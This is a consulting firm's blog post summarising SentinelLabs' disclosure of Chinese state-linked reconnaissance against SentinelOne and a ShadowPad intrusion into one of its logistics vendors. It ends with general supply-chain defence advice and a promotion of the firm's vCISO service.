China-Affiliated Threat Actors Mount Sophisticated Supply-Chain Campaign

Jun 12, 2025·By Ethan Coulthard

Introduction

SentinelOne’s threat research unit, SentinelLabs, has disclosed a coordinated campaign by China-linked APT groups—APT15/UNC5174 (“PurpleHaze”) and APT41 (“ShadowPad”)—that involved both direct reconnaissance and an indirect attack through a third-party IT/logistics vendor.

Cybersecurity warning alert system concept. Businessman working on laptop. Computer network hack, crime and virus, Malicious software, compromised information, illegal connection, data vulnerability,

Reconnaissance of SentinelOne Infrastructure

In October 2024, SentinelLabs detected a reconnaissance operation, dubbed PurpleHaze, where threat actors scanned SentinelOne’s internet-facing servers and registered lookalike domains such as sentinelxdr[.us] and secmailbox[.us]. The campaign aimed to map SentinelOne’s attack surface and assess it for potential footholds, though the company confirmed no compromises occurred.

Supply Chain Intrusion via a Third-Party Vendor

Early in 2025, the same threat actors started a second wave of activity targeting SentinelOne indirectly. The attack exploited an IT services/logistics provider responsible for hardware shipments. Using obfuscated ShadowPad malware (via the "ScatterBrain" loader), deployed through delayed-execution PowerShell scripts and wiped from memory by scheduled reboots, attackers installed the Nimbo‑C2 framework. This allowed remote access, screenshot capture, UAC bypass, and file exfiltration through 7‑Zip password-protected archives. Despite this intrusion, SentinelOne itself was not compromised.

Attribution & Attack Sophistication

The PurpleHaze activity (Sept–Oct 2024) is linked to APT15/UNC5174, based on usage of zero-day Ivanti exploits and the custom GOREshell, a Go-based backdoor. The ShadowPad operations from June 2024 onward match APT41’s profile: modular malware, advanced obfuscation, and remote access operations. Infrastructure reuse, domain naming conventions, and attack timing all reinforce the attribution to Chinese espionage actors.

Strategic Implications

Targeting cybersecurity vendors and supply chains demonstrates notable adversary sophistication. Cyber providers, like SentinelOne, are high-value targets—not only for access to internal systems, but also for surgical leverage over downstream clients. With traditional defenses hardened, attackers are increasingly probing peripheral entities to evade detection.

Recommended Defense Strategies

Adopt Zero Trust practices for supply chains by strictly verifying and monitoring third-party access.
Mandate compliance certifications (e.g., ISO 27001, NIST, CIS) and conduct regular security audits of critical vendors.
Participate in threat intelligence sharing (ISACs, fusion centers) to accelerate detection of supply-chain compromise.

Businessman using laptop computer with digital padlock on internet technology networking. cybersecurity concept, user privacy security and encryption, secure internet access Future technology and cybernetics, screen padlock.

Conclusion

The SentinelOne case underscores a rising trend in cybersecurity: the most fortified organizations can still be placed at risk through the vulnerable services and vendors they rely on. State-sponsored actors are adapting by leveraging indirect paths to achieve high-value access and long-term espionage operations. As attackers grow more sophisticated and global in their scope, defenders must meet them with deeper collaboration, greater transparency, and resilient architectures designed to anticipate attacks. If your company has concerns about their security posture consider TechHorizon Consulting's vCISO service. With this service we can help bolster your internal security for a fraction of the cost of hiring a full CISO. If this interests you please visit our "Contact Us" page.